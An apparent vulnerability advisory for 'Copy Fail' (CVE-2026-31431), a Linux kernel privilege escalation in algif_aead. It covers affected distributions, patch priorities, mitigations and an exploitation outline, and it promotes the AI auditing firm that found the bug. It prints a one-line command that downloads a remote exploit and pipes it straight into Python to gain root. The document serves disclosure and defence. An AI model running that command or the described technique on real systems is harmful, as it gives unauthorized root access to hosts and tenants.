Copy Fail: Critical Linux Kernel Exploit CVE-2026-31431
Discover Copy Fail, a devastating Linux kernel vulnerability (CVE-2026-31431) affecting kernels from 2017-2026. A tiny 732-byte Python script grants unprivileged users root access across Ubuntu, RHEL, SUSE, and more. Bypassing page cache protections, it corrupts setuid binaries silently without disk writes. Learn who’s affected, immediate mitigations, and why this portable LPE outclasses Dirty Pipe and Dirty Cow. Patch now for multi-tenant servers, Kubernetes, and CI runners.
Copy Fail: The Silent Linux Kernel Killer (CVE-2026-31431)
A single 732-byte Python script. Four major Linux distributions. Four root shells — no modifications, no recompilation, no fuss. Welcome to Copy Fail (CVE-2026-31431), the most portable local privilege escalation in recent Linux history.
The Exploit That Works Everywhere
Discovered through AI-assisted auditing by Xint Code, Copy Fail exploits a 2017 kernel optimization in the algif_aead crypto interface. Unprivileged users can write 4 controlled bytes directly into the page cache of any readable file — including setuid-root binaries like /usr/bin/su.
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
One take. 100% reliable. Every distro.
Who Needs to Panic (Patch Order)
| Priority | Environment | Risk |
|---|---|---|
| 🟥 High | Multi-tenant hosts, Kubernetes, CI runners | Any user → host root |
| 🟥 High | Cloud SaaS, notebook hosts | Tenant escape to host |
| 🟨 Medium | Single-tenant servers | Internal LPE chain |
| 🟢 Lower | Single-user workstations | Post-exploitation only |
Verified affected: Ubuntu 24.04, Amazon Linux 2023, RHEL 10, SUSE 16 (and counting).
What Makes Copy Fail Different
| Property | Typical LPE | Copy Fail |
|---|---|---|
| Race condition | ✅ Required | ❌ None |
| Per-distro offsets | ✅ Required | ❌ Universal |
| Reliability | 30-80% | ✅ 100% single-shot |
| Affected window | Narrow range | 2017 → 2026 (9 years) |
| Container escape | ❌ Host-only | ✅ Cross-tenant |
Unlike Dirty Pipe (pipe flags) or Dirty Cow (race conditions), Copy Fail is straight-line code abusing AEAD scatterlist mishandling.
Immediate Mitigation
1. Patch (Primary)
# Update kernel to include mainline commit a664bf3d603d
apt update && apt upgrade linux-image-generic # Ubuntu
yum update kernel # RHEL
zypper update kernel # SUSE
2. Emergency Disable (Pre-patch)
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Performance impact: None for 99.9% of workloads. Only affects rare AF_ALG users.
3. Container Hardening
Block AF_ALG sockets via seccomp for untrusted workloads.
Technical Deep Dive
The vulnerability lives in algif_aead (AF_ALG socket family). A 2017 'optimization' allowed in-place crypto where page-cache pages (read-only source) became the writable destination scatterlist.
splice()feeds page-cache pages into crypto scatterlist- AEAD authentication scribbles 4 AAD ESN bytes past buffer bounds
authenc_esnnever restores the overwritten page-cache bytesexecve(/usr/bin/su)reads corrupted page-cache → root shell
Stealth bonus: No VFS writes, no dirty pages, no disk changes. Evict cache or reboot → clean file.
Disclosure Timeline
- 2026-03-23: Reported to kernel team
- 2026-04-01: Patch committed
- 2026-04-29: Public disclosure
Defend Responsibly
The PoC is public (sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9) for defenders to test patches. Only run on authorized systems.
Multi-tenant operators: Patch yesterday. This isn't theoretical.
Found by Xint Code — AI security auditing that actually works.